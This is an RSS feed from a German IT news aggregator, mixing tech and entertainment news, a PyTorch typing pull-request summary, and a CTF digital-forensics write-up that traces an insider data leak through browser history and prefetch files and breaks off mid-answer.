		filesize &lt; 1MB and $filemarker in (0 .. 128) and (((any of ($magic*) or any of ($marker*)) and (any of ($s*) or any of ($t*) or any of ($u*))) or 4 of ($s*) or 4 of ($b_s*) or all of ($t*) or all of ($b_t*) or 6 of ($u*) or 6 of ($b_u*))
}</code></pre></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Honor 600 Pro im Test: Besser als Honors Magic-Smartphones?]]></title>
<description><![CDATA[Das Honor 600 Pro soll mehr sein als eine gehobene Mittelklasse-Alternative. Das neue Smartphone setzt auf viel Leistung, Ausdauer, starke Kameratechnik und KI im Alltag. Reicht das, um die noch teureren Flaggschiffe zu ärgern?]]></description>
<link>https://tsecurity.de/de/3599113/it-nachrichten/honor-600-pro-im-test-besser-als-honors-magic-smartphones/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599113/it-nachrichten/honor-600-pro-im-test-besser-als-honors-magic-smartphones/</guid>
<pubDate>Mon, 15 Jun 2026 14:47:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Honor 600 Pro soll mehr sein als eine gehobene Mittelklasse-Alternative. Das neue Smartphone setzt auf viel Leistung, Ausdauer, starke Kameratechnik und KI im Alltag. Reicht das, um die noch teureren Flaggschiffe zu ärgern?]]></content:encoded>
</item>
<item>
<title><![CDATA[Honor’s Magic V6 sets three foldable firsts]]></title>
<description><![CDATA[On paper, the Honor Magic V6 sounds like a tremendous leap forward for foldable phones: It's the thinnest one yet, with the biggest battery, and the best water-resistance ever. In practice, only the bigger battery feels like a meaningful improvement. The other upgrades are only fractionally super...]]></description>
<link>https://tsecurity.de/de/3598884/it-nachrichten/honors-magic-v6-sets-three-foldable-firsts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598884/it-nachrichten/honors-magic-v6-sets-three-foldable-firsts/</guid>
<pubDate>Mon, 15 Jun 2026 13:17:48 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[On paper, the Honor Magic V6 sounds like a tremendous leap forward for foldable phones: It's the thinnest one yet, with the biggest battery, and the best water-resistance ever. In practice, only the bigger battery feels like a meaningful improvement. The other upgrades are only fractionally superior to what came before. This isn't entirely Honor's […]]]></content:encoded>
</item>
<item>
<title><![CDATA[As 'Disclosure Day' Premieres, Steven Spielberg Says He Believes Aliens Really Have Visited Earth]]></title>
<description><![CDATA[Steven Spielberg grants that his 1977 UFO film Close Encounters was "speculative," writes the Associated Press, but "Disclosure Day, he insists, is the real deal."

"It's my first film that will be considered science fiction that I do not consider to be science fiction," Spielberg said in a recen...]]></description>
<link>https://tsecurity.de/de/3597598/it-security-nachrichten/as-disclosure-day-premieres-steven-spielberg-says-he-believes-aliens-really-have-visited-earth/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597598/it-security-nachrichten/as-disclosure-day-premieres-steven-spielberg-says-he-believes-aliens-really-have-visited-earth/</guid>
<pubDate>Sun, 14 Jun 2026 22:22:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Steven Spielberg grants that his 1977 UFO film Close Encounters was "speculative," writes the Associated Press, but "Disclosure Day, he insists, is the real deal."

"It's my first film that will be considered science fiction that I do not consider to be science fiction," Spielberg said in a recent interview. "It's much more reflective of the world as it is evolving and discoveries that are being made as we speak." Spielberg, at 79, is trying to revive and reconsider the alien wonder that's long lingered in his mind, from "E.T." to "War of the Worlds." "Disclosure Day," Spielberg's first summer movie in a decade, is already being hailed as one of his best in years. But this time, Spielberg is testing whether he can conjure some of his trademark movie magic less with imagination than with conviction. "I've been a believer since I made 'Close Encounters' 50 years ago," Spielberg says. "But I would always say: Until I've seen a UAP or a UFO with my own eyes, I'm not going to categorically state that life from out there has come here. But I've changed that," he adds. "I'm now willing to change my mind because of the circumstantial evidence which is overwhelming..." 


Spielberg, having long followed reports of alleged alien encounters, was inspired by the 2023 House Subcommittee on National Security hearing on UAPs: Unidentified Anomalous Phenomena. Among the witnesses was whistleblower and former Air Force intelligence officer David Grusch, who testified that the government concealed a program investigating UAPs. The Pentagon then denied it... Those 2023 testimonies and others so fueled Spielberg that he produced a 50-page treatment on what would become "Disclosure Day." During the writing process with Koepp, he texted him more notes, he says, "than I've ever sent to anyone in my life." 
"There was a period in there where I believe he re-read the script every single day for a year," Koepp says. "We'd be in different time zones and I would wake up to 30 or 35 texts from his most current reading of the script. When the leader of the project has that level of commitment, it tends to bring along everyone. You up your game." 
The article calls it "a grand bookend for one of the most cosmically-minded moviemakers of our time." But the man who filmed some of the world's first summer blockbusters also shared his thoughts on the future of movies. "Even though the numbers are still not pre-COVID level numbers for any films being released now, it's more robust than it has been for many years. The audience gives me belief that people still want to congregate in a dark space in the company of strangers to share an experience of a film made by storytellers. And that gives me faith to continue making films." 

Rolling Stone wrote that "There's a lot to love in Disclosure Day." Though they also offer this pithy summary of its plot. "Remember when Steven Spielberg digitally replaced the guns in the hands of government agents for the 20th anniversary of E.T., then expressed regret about the decision? Imagine that he not only restored the weapons but crafted an entire two-and-a-half-hour feature around that one sequence as a mea culpa. That's Disclosure Day."


The filmmaker may be staging a pulpy campaign with this sci-fi throwback, but he sincerely seems to believe the truth is out there — and will set us free... [W]hile the quality of his output can vary wildly when you look at the big picture of his career, there's still a baseline of love — for filmmaking, for storytelling through images, for giving people an experience that pushes emotional buttons and taps adrenal glands — that gives his work a sense of vitality and displays the sensibility of an artist at work... 
There's also a weird full-circle feel to it, and not just because he's returning to the fertile ground of Close Encounters and his other science fiction spectacles. You can see traces of everything from Duel to Minority Report show up, to the point where this almost doubles as a career retrospective in miniature... Yes, Spielberg does believe that we are not the only game running in the cosmos. But he also believes that our better angels have not left the building, and that movies still have the power to communally blow minds and open hearts. 

The Associated Press calls it "a grand bookend for one of the most cosmically-minded moviemakers of our time" and "a distant answer to the final notes of Close Encounters."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=As+'Disclosure+Day'+Premieres%2C+Steven+Spielberg+Says+He+Believes+Aliens+Really+Have+Visited+Earth%3A+https%3A%2F%2Fentertainment.slashdot.org%2Fstory%2F26%2F06%2F14%2F208255%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fentertainment.slashdot.org%2Fstory%2F26%2F06%2F14%2F208255%2Fas-disclosure-day-premieres-steven-spielberg-says-he-believes-aliens-really-have-visited-earth%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://entertainment.slashdot.org/story/26/06/14/208255/as-disclosure-day-premieres-steven-spielberg-says-he-believes-aliens-really-have-visited-earth?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[2011 MacBook Pro looks like it just came out of the store after installing UBUNTU]]></title>
<description><![CDATA[What kind of magic is this? I bought this old 2011 MacBook Pro upgraded with more RAM and an SSD. I tried installing Monterey and Sonoma on it with OpenCoreLegacy and I honestly don't know how people can recommend this kind of installation. The Mac was clearly struggling. It ran hot with anything...]]></description>
<link>https://tsecurity.de/de/3597589/linux-tipps/2011-macbook-pro-looks-like-it-just-came-out-of-the-store-after-installing-ubuntu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597589/linux-tipps/2011-macbook-pro-looks-like-it-just-came-out-of-the-store-after-installing-ubuntu/</guid>
<pubDate>Sun, 14 Jun 2026 22:14:09 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>What kind of magic is this?</p> <p>I bought this old 2011 MacBook Pro upgraded with more RAM and an SSD. I tried installing Monterey and Sonoma on it with OpenCoreLegacy and I honestly don't know how people can recommend this kind of installation.</p> <p>The Mac was clearly struggling. It ran hot with anything, even after being cleaned and having the thermal paste replaced. Half the features didn't work or weren't applicable, it was full of bugs, Night Shift would make text flicker while scrolling and turn it orange. Browsers in full screen were no longer recognized by the trackpad. I could only switch or close tabs using CMD, and don't even get me started on the App Store, which supported practically nothing. I had a knockoff macOS that wasn't even remotely macOS.</p> <p>I downloaded Ubuntu with a lot of anxiety, thinking it would require who knows how much effort, but instead everything was PERFECT. I knew there were some configurations to do at the start because of the Wi-Fi and some fan and battery issues specific to this MacBook, but with AI I was able to tinker in the terminal and between one <code>sudo</code> and the next I fixed everything, and the Mac was REBORN. It looks like it just came out of the store. It doesn't run hot, it's smooth, the blue light filter works perfectly, everything works.</p> <p>Ubuntu is absolutely easy and intuitive. I prefer it to Windows for sure, and maybe even to macOS. It's genuinely foolproof. A popup appears for everything, YOU CANNOT GO WRONG. Seriously, who spread the rumor that Linux is difficult? It's crazy. I'm a total noob and I probably never would have done it without AI, because I had no desire to read through forums and guide after guide, but AI simplified that part, and now Linux might become my favorite OS. I also love that Ubuntu is basically the macOS of Linux.</p> <p>Whoever you are, creator of Ubuntu, congratulations, you did an amazing job, far more competent than billion-dollar companies. Thanks to you, this MacBook I bought to learn how to tinker has just been reborn.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Intrepid-Routine-875"> /u/Intrepid-Routine-875 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1u5vdxu/2011_macbook_pro_looks_like_it_just_came_out_of/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1u5vdxu/2011_macbook_pro_looks_like_it_just_came_out_of/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Will Meta's $14 Billion Bet on AI Ever Pay Off?]]></title>
<description><![CDATA["A year after spending over $14 billion to bring in Alexandr Wang and a group of his top Scale AI engineers to revamp its artificial intelligence efforts, Meta is at least back on the map in AI," reports CNBC, "though it's still far behind OpenAI, Anthropic and Google in the market."

Wang's big ...]]></description>
<link>https://tsecurity.de/de/3597513/it-security-nachrichten/will-metas-14-billion-bet-on-ai-ever-pay-off/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597513/it-security-nachrichten/will-metas-14-billion-bet-on-ai-ever-pay-off/</guid>
<pubDate>Sun, 14 Jun 2026 21:11:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA["A year after spending over $14 billion to bring in Alexandr Wang and a group of his top Scale AI engineers to revamp its artificial intelligence efforts, Meta is at least back on the map in AI," reports CNBC, "though it's still far behind OpenAI, Anthropic and Google in the market."

Wang's big accomplishment was the delivery of the Muse Spark AI model in April, marking Meta's first jump into proprietary foundation models and away from a strict adherence to open source, or open weight as it's more commonly called in AI... "Meta needs to provide more proof points of both adoption and commercialization," said Ralph Schackart, an analyst at William Blair who recommends buying the stock. "Investors are looking for Meta to monetize a new AI-first product, beyond the substantial positive impact AI is having on enhancing the advertising models." Wall Street, at least so far, is unimpressed. Meta's stock is down 18% over the past 12 months, the worst performer in the megacap group, along with Microsoft, which has its own challenges in AI. That's even after Meta reported 33% revenue growth in the first quarter, the fastest rate of expansion for any period since 2021. 

For Meta, the problem started with what some industry experts called, in hindsight at least, a strategic blunder. The company jumped into AI with its Llama family of models, offering an open-source approach that allowed developers to freely tinker, while the other big model makers charged for access. In April of last year, Meta's release of Llama 4 fell flat, failing to captivate developers and leading Zuckerberg to reconsider his company's approach to AI development... Since the release of Muse Spark, Meta has unveiled new AI and business-related subscription plans as part of an effort to expand its business beyond online ads. Historically, it hasn't worked. Meta still counts on ads for 98% of revenue. Schackart said he wants to see "tangible evidence of a growing list of new, AI-first products created by Muse Spark, even if monetization lags." He said that's "what investors are looking for." 

No matter how good Wang's model may be, Zuckerberg has a high hill to climb with developers coming off the Llama debacle. "I think the AI community largely ignores Meta at this point," said Rob May, CEO of the startup Neurometric, which works in the realm of token engineering.... Krish Subramanian, the CEO of consulting firm KOI AI and former product head at IBM Consulting, said developers are more excited about Google's AI models than what Meta is offering. The appeal of Llama was that it specifically targeted developers wanting open-weight alternative models, while with Muse Spark, Meta has made little effort in that direction, he said. "The lack of developer trust will come back to hit them if they don't focus on third-party developers," Subramanian said, noting that it took years for Microsoft to regain trust from open-source coders during the early days of Azure. "To just focus on a walled-garden kind of an ecosystem and ad revenue as the main source of income, they probably will never become the big player," he said. 

A Meta spokesperson pointed to Wang's recent comments about the company's continued support for the open-source ecosystem, and said Meta still plans to offer outside developers access to Muse Spark's underlying technology via an API, as it previously announced. "We're already testing with some early partners, and look forward to releasing it this month," the spokesperson said. 

"That Zuckerberg's metaverse and virtual reality ambitions have generated over $80 billion in total losses since late 2020 makes the AI pitch a tougher sell," the article points out, citing this observation from Howard Yu, business professor at Switzerland's International Institute for Management Development. 

"He's running out of the space for his credibility to last," Yu said. "I think the virtual reality foray may have burned up a lot of his goodwill in front of investors."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Will+Meta's+%2414+Billion+Bet+on+AI+Ever+Pay+Off%3F%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F06%2F14%2F1842208%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F06%2F14%2F1842208%2Fwill-metas-14-billion-bet-on-ai-ever-pay-off%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/06/14/1842208/will-metas-14-billion-bet-on-ai-ever-pay-off?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Elon Musk and co may relish march of the robots but there must be AI boundaries in the workplace | Heather Stewart]]></title>
<description><![CDATA[As such technology advances quickly, firms should not lose sight of what qualities humans bring to jobsA robot magician called D4YRL was rejected as a member of the Magic Circle last week, for being insufficiently human.While D4YRL’s tricks were exemplary, the august organisation decided “he” did...]]></description>
<link>https://tsecurity.de/de/3596953/ai-nachrichten/elon-musk-and-co-may-relish-march-of-the-robots-but-there-must-be-ai-boundaries-in-the-workplace-heather-stewart/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3596953/ai-nachrichten/elon-musk-and-co-may-relish-march-of-the-robots-but-there-must-be-ai-boundaries-in-the-workplace-heather-stewart/</guid>
<pubDate>Sun, 14 Jun 2026 13:18:10 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>As such technology advances quickly, firms should not lose sight of what qualities humans bring to jobs</p><p>A robot magician called D4YRL was rejected as a member of the Magic Circle last week, for being insufficiently human.</p><p>While D4YRL’s tricks were exemplary, the august organisation decided “he” did not engage the audience’s emotions as a flesh-and-blood performer would.</p> <a href="https://www.theguardian.com/business/2026/jun/14/ai-technology-workplace-boundaries-elon-musk">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[ciflow/trunk/186323: Type annotations (and runtime fallout) for torch/__init__.py (#186323)]]></title>
<description><![CDATA[Summary:
Pull Request resolved: #186323
Removes # mypy: allow-untyped-defs from torch/__init__.py (and adds a matching pyrefly.toml sub-config) and reworks how the magic methods on SymInt, SymFloat, and SymBool are typed.
Previously each class carried a long hand-written list of placeholder stubs...]]></description>
<link>https://tsecurity.de/de/3596460/downloads/ciflowtrunk186323-type-annotations-and-runtime-fallout-for-torchinitpy-186323/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3596460/downloads/ciflowtrunk186323-type-annotations-and-runtime-fallout-for-torchinitpy-186323/</guid>
<pubDate>Sun, 14 Jun 2026 05:01:05 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Summary:<br>
Pull Request resolved: <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4594167766" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/186323" data-hovercard-type="pull_request" data-hovercard-url="/pytorch/pytorch/pull/186323/hovercard" href="https://github.com/pytorch/pytorch/pull/186323">#186323</a></p>
<p>Removes <code># mypy: allow-untyped-defs</code> from <code>torch/__init__.py</code> (and adds a matching <code>pyrefly.toml</code> sub-config) and reworks how the magic methods on <code>SymInt</code>, <code>SymFloat</code>, and <code>SymBool</code> are typed.</p>
<p>Previously each class carried a long hand-written list of placeholder stubs like <code>def __add__(self, other) -&gt; "SymInt": ...</code>. These didn't model the actual promotion rules — e.g. <code>SymInt + float</code> returns <code>SymFloat</code>, <code>Tensor + SymT</code> returns <code>Tensor</code>, and arithmetic on <code>SymBool</code> promotes to <code>SymInt</code>. Three new generic mixins encode those rules once and are reused across all three classes:</p>
<ul>
<li><code>_SymTypingMagicAlsoBool[_PrimType, _BecomesIntPrimType, _BecomesIntSymType, _FloatPromotionType]</code> — comparisons (<code>==</code>, <code>!=</code>, <code>&lt;</code>, <code>&lt;=</code>, <code>&gt;</code>, <code>&gt;=</code>) and the bool-promoting arithmetic ops (<code>+</code>, <code>-</code>, <code>*</code>, plus their <code>r</code>-variants), with <code>_FloatPromotionType</code> controlling whether the result can be <code>SymFloat</code>.</li>
<li><code>_SymTypingMagic[_PrimType, _SymType, _FloatPromotionType]</code> — the rest of the numeric magic methods (<code>abs</code>, <code>neg</code>, <code>floor</code>, <code>ceil</code>, <code>trunc</code>, <code>mod</code>, <code>lshift</code>/<code>rshift</code>, <code>pow_by_natural</code>, the <code>__sym_*__</code> math wrappers, <code>__int_truediv__</code> / <code>__int_floordiv__</code>, etc.).</li>
<li><code>_SymTypingMagicBitwise[_BitwiseLikeType]</code> — <code>__and__</code>, <code>__or__</code>, <code>__xor__</code> and their reflected forms.</li>
</ul>
<p><code>SymInt</code>/<code>SymFloat</code>/<code>SymBool</code> then become small concrete subclasses parameterized over the right operand and result types (e.g. <code>SymFloat</code>'s float-promotion type is <code>_Never</code> since it doesn't promote further).</p>
<p>Runtime side, <code>sym_node.py</code> gains a real <code>xor</code> entry in <code>bitwise_ops</code>, <code>only_bool_magic_methods</code>, and the dispatch table (with a new <code>_sympy_xor</code>), and <code>also_bool_magic_methods</code> is widened from just <code>{"eq"}</code> to the full comparison set <code>{"eq", "ge", "gt", "le", "lt", "ne"}</code> so the methods installed at runtime line up with what the new mixin advertises. A <code>magic_methods_excl</code> helper set is added for the remainder.</p>
<p>Other fallout from removing <code>allow-untyped-defs</code>:</p>
<ul>
<li><code>PySymType</code> is exported from <code>torch._C</code> stubs and threaded into the asymmetric comparison-op signatures generated by <code>tools/pyi/gen_pyi.py</code>, so <code>Tensor.__lt__(SymInt)</code> etc. type-check.</li>
<li><code>SymInt.has_hint()</code>, <code>SymInt.hint</code>, <code>SymInt.constant</code> move from ad-hoc <code>.node.*</code> access to typed <code>property</code> accessors; <code>definitely_true_hint</code>/etc. are updated to use them.</li>
<li><code>SymNode.shape_env</code> is <code>Optional</code>, so callers in <code>symbolic_shapes.py</code> now raise explicit <code>AssertionError("shape_env should not be None")</code> instead of relying on it being set. A couple of <code>maybe_as_int()</code> / <code>maybe_as_float()</code> call sites are tightened with walrus assignment to avoid calling the method twice.</li>
<li><code># pyrefly: ignore[missing-attribute]</code> is added where <code>SymInt.node</code> is duck-typed across <code>SymNode | NestedIntNode | ConstantIntNode | LocalIntNode</code> and the attribute only exists on some.</li>
</ul>
<p>Review order: start with <code>torch/__init__.py</code> — the three new mixins and the rewritten <code>SymInt</code>/<code>SymFloat</code>/<code>SymBool</code> definitions are where the design lives. Then <code>torch/fx/experimental/sym_node.py</code> for the runtime registration of <code>xor</code> and the broadened <code>also_bool_magic_methods</code>. Everything else is small call-site adjustments to satisfy the stricter typing.</p>
<p>Test Plan:<br>
CI.</p>
<p>Authored with Claude.</p>
<p>Reviewed By: bobrenjc93</p>
<p>Differential Revision: D106389841</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Elon Musk is now worth more than $1,000,000,000,000]]></title>
<description><![CDATA[Retail investors lined up to get a handful of Musk's magic beans in SpaceX's debut]]></description>
<link>https://tsecurity.de/de/3594559/it-nachrichten/elon-musk-is-now-worth-more-than-1000000000000/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594559/it-nachrichten/elon-musk-is-now-worth-more-than-1000000000000/</guid>
<pubDate>Fri, 12 Jun 2026 23:18:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Retail investors lined up to get a handful of Musk's magic beans in SpaceX's debut]]></content:encoded>
</item>
<item>
<title><![CDATA[3 ways the new Brydge Max iPad keyboard case beats Apple’s Magic Keyboard [Review] ★★★★☆]]></title>
<description><![CDATA[The Brydge Max 13.0 might be the best iPad keyboard case on the market. Our hands-on review pits it against Apple's own version.
(via Cult of Mac - Your source for the latest Apple news, rumors, analysis, reviews, how-tos and deals.)]]></description>
<link>https://tsecurity.de/de/3593690/ios-mac-os/3-ways-the-new-brydge-max-ipad-keyboard-case-beats-apples-magic-keyboard-review/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3593690/ios-mac-os/3-ways-the-new-brydge-max-ipad-keyboard-case-beats-apples-magic-keyboard-review/</guid>
<pubDate>Fri, 12 Jun 2026 16:12:07 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><img width="780" height="439" src="https://www.cultofmac.com/wp-content/uploads/2026/06/Brydge-Max-13-0-review_07-1440x810.jpg.webp" class="attachment-large size-large wp-post-image" alt="Brydge Max 13.0 review" decoding="async" fetchpriority="high" srcset="https://www.cultofmac.com/wp-content/uploads/2026/06/Brydge-Max-13-0-review_07-1440x810.jpg.webp 1440w, https://www.cultofmac.com/wp-content/uploads/2026/06/Brydge-Max-13-0-review_07-400x225.jpg 400w, https://www.cultofmac.com/wp-content/uploads/2026/06/Brydge-Max-13-0-review_07-350x197.jpg 350w, https://www.cultofmac.com/wp-content/uploads/2026/06/Brydge-Max-13-0-review_07-768x432.jpg.webp 768w, https://www.cultofmac.com/wp-content/uploads/2026/06/Brydge-Max-13-0-review_07-1020x573.jpg.webp 1020w, https://www.cultofmac.com/wp-content/uploads/2026/06/Brydge-Max-13-0-review_07.jpg.webp 1448w, https://www.cultofmac.com/wp-content/uploads/2026/06/Brydge-Max-13-0-review_07-400x225@2x.jpg 800w" sizes="(max-width: 780px) 100vw, 780px"></div>
<p>The Brydge Max 13.0 might be the best iPad keyboard case on the market. Our hands-on review pits it against Apple's own version.</p>
<p>(via <a href="https://www.cultofmac.com/">Cult of Mac - Your source for the latest Apple news, rumors, analysis, reviews, how-tos and deals.</a>)</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IEEE Victoris 4.0 — CTF 2025 — Quals DFIR Challenges]]></title>
<description><![CDATA[IEEE Victoris 4.0 — CTF 2025 —Quals DFIR ChallengesHi, I’m glad to share with you my writeup for getting first blood in 2/2 DFIR challenges.First Challenge: “the Frontdoor” FIRST BLOOD🩸in this challenge, we have a linux disk image, we need to investigate it to get the correct answer. reading the ...]]></description>
<link>https://tsecurity.de/de/3592750/hacking/ieee-victoris-40-ctf-2025-quals-dfir-challenges/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592750/hacking/ieee-victoris-40-ctf-2025-quals-dfir-challenges/</guid>
<pubDate>Fri, 12 Jun 2026 09:33:33 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>IEEE Victoris 4.0 — CTF 2025 —Quals DFIR Challenges</h3><p>Hi, I’m glad to share with you my writeup for getting first blood in 2/2 DFIR challenges.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/843/1*r7vTPHgC_0t6kAXxFx3N3w.png"></figure><p>First Challenge: “the Frontdoor” <strong>FIRST BLOOD</strong>🩸</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/495/1*3HO6z-6mliIaDQWTDIdYQA.png"></figure><p>in this challenge, we have a linux disk image, we need to investigate it to get the correct answer. reading the bash history or “.zsh_history” we can view that there’s a lot of file navigations commands, and Git activity in “MyProject” which located in /home/Documents.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*F4F7ja4jNJLXS8fvZVKJaQ.png"></figure><p>also, while i was digging around all linux files, i found an xml file “recently-used.xml” located in “/home/kali/.local/share/recently-used.xml”. this xml tracks that he opened /home/kali/Documents/MyProject/.git/config file using Mousepad and Thunar “kali linux gui”.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ohWftXZJyRAjWf0oFxuMaw.png"></figure><p>so, configfile will be first file to check in MyProjectdirectory</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1009/1*UyQzYFMbtxYv-QzRQDDicQ.png"></figure><p>we can see there’s a beautiful base64 encoded that contains our flag:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/855/1*aCdLTbSVud0hl10YXYp-yA.png"></figure><pre>IEEE{192.168.213.68:3421}</pre><p>Second Challenge: “<strong>Lay-off</strong>” <strong>FIRST BLOOD</strong>🩸</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/450/1*TTZ1qGQeR4PTvxxgYHpGxA.png"></figure><p>this one was so challenging, we got 14 questions that needs to be answered correctly to get our very precious flag</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*kHHnZbOj_KAfLcWu4z6BiA.png"></figure><pre>=== Question Menu ===<br>Unanswered:<br>  1) What is the full name of the employee who sent the email?<br>  2) When was QR Tag company founded? (format: year)<br>  3) What website did the developer log into at 2025-09-18 17:56:51?<br>  4) what was the first thing the developer looked for after receiving the email?<br>  5) The developer created a compressed archive to leak confidential information about QR Tag company. What was it's name?<br>  6) Can you determine the number of files have been leaked?<br>  7) When did this archive get deleted?<br>  8) The developer contacted some buyers on telegram dark markets to sell some of QR Tag's confidential information. What utility did he use to send the data?<br>  9) What is the bot token and chat id used in the script? (format: bot_token:chat_id)<br>  10) Which telegram API did the developer use to send the archive to the bot?<br>  11) What is the username and password of the database used in QR Tag website? (format: username:password)<br>  12) What version of express did the developer use?<br>  13) What service will the QR Tag partnership provide?<br>  14) The developer used a security feature to securely encrypt a secret file. Can you determine what he was trying to hide?</pre><p>we have a windows disk image, and an email :</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/374/1*JVkqWJkKf_TmjOvMphJKAA.png"></figure><pre>1) What is the full name of the employee who sent the email?</pre><p>open the email with thunderbird, you'll find the correct answer easily:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*iJSzHFWHv0nobrFxeZE8ag.png"></figure><pre>1) What is the full name of the employee who sent the email? --&gt; Huda Ahmed</pre><pre>2) When was QR Tag company founded? (format: year)</pre><p>with an online research on linkedin, we'll find in image with same name located in Egypt, Ismailia.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Bh6y9oU10XLNDQlznyb9xQ.png"><figcaption><strong>challenge author follows this page</strong></figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/186/1*KC82e8NCoIrYFGklYoZ-6g.png"></figure><pre>2) When was QR Tag company founded? (format: year) --&gt; 2024</pre><pre>3) What website did the developer log into at 2025-09-18 17:56:51?</pre><p>“<strong>log into</strong>” , by checking the Microsoft edge History database, which located in: C:\Users\&lt;username&gt;\AppData\Local\Microsoft\Edge\User Data\&lt;Profile&gt;\History</p><p>in urls table, sort them by time and go to the following website to decode the time:</p><p><a href="https://www.epochconverter.com/webkit">WebKit/Chrome Timestamp Converter</a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*CKNUs9pqA2WuXvtYIal1sQ.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/698/1*MbwVthWRGbeoiIkgWsUwUA.png"><figcaption><strong>time is perfectly correct</strong></figcaption></figure><pre>3) What website did the developer log into at 2025-09-18 17:56:51?<br>   Answer: www.qrtagapp.com</pre><pre>4) what was the first thing the developer looked for after receiving the email?</pre><p>using thunderbird, open the email with message source, or open the email with any text editor:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/579/1*E4Gsez-x9XrpnbP_zrk-NA.png"></figure><p>so, the correct time must be “<strong>2025–09–19 00:08:59</strong>” in GMT +3</p><p>now let’s find anything intresting, but in the history database of firefox, located in: C:\Users\&lt;username&gt;\AppData\Roaming\Mozilla\Firefox\Profiles\&lt;profile folder&gt;\places.sqlite</p><p>you'll find that, the most recent search after the email was send was all these searches in “<strong><em>moz_places</em></strong>” table:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*357pilL9LM4ujk4fa3LMbw.png"></figure><pre>4) what was the first thing the developer looked for after receiving the email?<br>   <br>   Answer: telegram leaks channels</pre><pre>5) The developer created a compressed archive to leak confidential information about QR Tag company. What was it's name?</pre><p>this was a little dizzy, but what i did was parsing the prefetch files with PECMD <a href="https://ericzimmerman.github.io/#!index.md"><strong>here</strong></a>, and see if there any zip, rar, 7z, gz and so on.</p><p>And yes, i found the prefetch data for using 7z.exe:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/834/1*ja5aSOG_bDC_wKy2dJj36A.png"></figure><p>now let’s check for all files referenced, we can see a 7z file located on MHANY’s desktop:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/876/1*RrvUM43PjOtLcotdMysp1w.png"></figure><pre>5) The developer created a compressed 